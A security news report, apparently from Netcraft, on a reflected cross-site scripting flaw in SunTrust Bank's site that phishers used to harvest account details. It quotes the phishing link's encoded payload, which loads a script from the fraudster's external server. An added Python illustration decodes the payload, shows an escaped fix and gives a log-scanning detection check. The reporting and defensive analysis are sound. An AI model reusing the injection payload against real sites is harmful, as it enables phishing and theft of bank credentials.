A facility in SunTrust Bank's www.suntrust.com web site is allowing fraudsters
to inject their own code into the site to obtain SunTrust customer account authentication
details, and at least one fraudster has exploited this error by sending large
numbers of electronic mails purporting to be from SunTrust, asking the user
to confirm their bank account on his form, executed from SunTrust's web site.
This makes the fraud much more convincing than traditional phishing mails,
as the URL the SunTrust customer clicks on actually runs from the SunTrust site
before loading JavaScript from the fraudster's server, located in Korea.
The JavaScript then changes the title of the page to "Suntrust Online
Banking - Account Verification" and sets the window status to "Suntrust
Online Banking", thereby preventing suspicious URLs from being displayed
when the victim hovers their mouse cursor over a hyperlink. An 'iframe' is used
to insert a form onto the page, which asks the customer to enter their Social
Security number and SunTrust banking details. When the form is submitted, it
is processed by a PHP script, allowing the attacker to capture the account details.
The phishing emails received by Netcraft contain the following HTML to create
a hyperlink to the SunTrust web site:
<a href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w
&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E)
http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w
&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E"
target="_blank">click here.</td></tr></table></a>
One of the parameters supplied to the page is not properly encoded when the
SunTrust site displays it, which allows an attacker to inject arbitrary HTML,
including JavaScript which is executed by customers' web browsers. The script-injecting
portion of the URL (the promo parameter), which unnecessarily appears twice, causes the following
script to be inserted into the page:
<script language=javascript src="http://211.175.176.179/sun/sun.js">
</SCRIPT>
This in turn executes the JavaScript which is responsible for altering the
contents of the page.
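As an added illustration (not code from the article, from SunTrust or from the fraudster), the reflection bug and its fix in Python, assuming the parameter was echoed inside a quoted attribute value, which is what the leading "> of the payload suggests; the template, the function names and the log-review check are hypothetical.

```python
import html
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed copy of the link quoted in the article (the script's host is the fraudster's server).
PHISHING_URL = (
    "http://www.suntrust.com/onlinestatements/index.asp"
    "?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w"
    "&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F"
    "%3211%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E"
)

# Hypothetical reflection context: the parameter lands inside a quoted attribute value.
TEMPLATE = '<input type="hidden" name="promo" value="{promo}">'


def promo_from_url(url: str) -> str:
    """URL-decode the promo parameter the way the server does (one pass of percent-decoding)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("promo", [""])[0]


def render_vulnerable(promo: str) -> str:
    """Reflects the value verbatim: the leading "> closes the attribute and tag, so <script> becomes live markup."""
    return TEMPLATE.format(promo=promo)


def render_hardened(promo: str) -> str:
    """HTML-encodes the value first, so quotes and angle brackets are inert text and no tag is created."""
    return TEMPLATE.format(promo=html.escape(promo, quote=True))


def suspicious_params(url: str) -> list:
    """Log-review check: names of query parameters whose decoded value carries script or frame markup."""
    flagged = []
    for pair in urlsplit(url).query.split("&"):
        name, _, raw_value = pair.partition("=")
        decoded = unquote_plus(raw_value).lower()
        if "<script" in decoded or "<iframe" in decoded or "javascript:" in decoded:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    payload = promo_from_url(PHISHING_URL)
    print("decoded promo :", payload)
    print("vulnerable    :", render_vulnerable(payload))
    print("hardened      :", render_hardened(payload))
    print("flagged params:", suspicious_params(PHISHING_URL))
```

The decoded promo value is exactly the script tag quoted above; the percent-encoded digits in the IP address (%32, %37) decode in the same single pass, so a decode-then-inspect check on the request log sees the real host.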
Fraudsters have noticed opportunities in SunTrust's internet banking operations
previously, and a similar attack was executed in September.
Careless application errors and inadequate testing are believed to be an industry-wide
problem for internet banking. Although the man in the street would find it appalling
that someone could run a fraud from a bank's own site, SunTrust's competitors are
unlikely to be strongly critical, for fear of similar problems with their own facilities.